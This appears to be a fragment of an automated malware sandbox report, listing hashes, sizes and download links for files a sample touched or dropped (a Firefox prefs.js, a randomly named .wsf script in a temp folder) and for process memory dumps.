967506555ff0733a9fd4a44bffda77bf

SHA1
74a9c2a8ce64cb34f336fa0d787aa337356aa999

SHA256
f36bbc3e818c2390dc1a29a03eaf6289d02ce081f5818ab36beb45521e3e0306

SHA512
4a62a1877c100bdcbc061656aeaee37fda48a54de74e3cfd440984d67db7c740229ea257d7783b54d1c5a79369cfa9698176b2cef234feff24c3b65c0ebf2259

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.js
Filesize
6KB

MD5
fcd2fbb0957b3e8a63d48d508a9cccfd

SHA1
486bf982500df507e264f3f89f043e53d55621f4

SHA256
56e35eda4a1338a9e18931fb34ddf0753935cb6c193c86286d09fe3465567e96

SHA512
8baa29334b64bdd66b298d9e4a53c84db05e70d1cacdf984c9a1c3412ea4b969f7c2a3e47fb1dfc61753cdff85d59ec109d77485f7bb30d8c55222d9d0d6a0e0

Download Submit
C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf
Filesize
9KB

MD5
68a8bdc9d9f09ff06ba1eac18457c0c7

SHA1
659af8fef29016caa8cb74a317d6eb66e7e44269

SHA256
886c60b61f2b8847420eef4d7090e9a07acd5a2c0bed51427f6db5b04cfbe616

SHA512
b92c8e46a85cc4dfe01269350f84168af46b14af671faad8e79bc98c1ea2b4914d89475741df1904dba30b63ecd8b219577e30485a104565e6a385e9f0e40852

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1196-39-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/1628-12-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1628-11-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/1684-22-0x000000001B830000-0x000000001BB12000-memory.dmp

Filesize
2.9MB

Download
memory/1684-23-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2780-2-0x0000000010000000-0x00000000105D3000-memory.dmp

Filesize
5.8MB

Download
memory/2780-88-0x0000000004060000-0x00000000040C5000-memory.dmp

Filesize
404KB

Download
memory/2780-51-0x0000000003A70000-0x0000000003AF5000-memory.dmp

Filesize
532KB

Download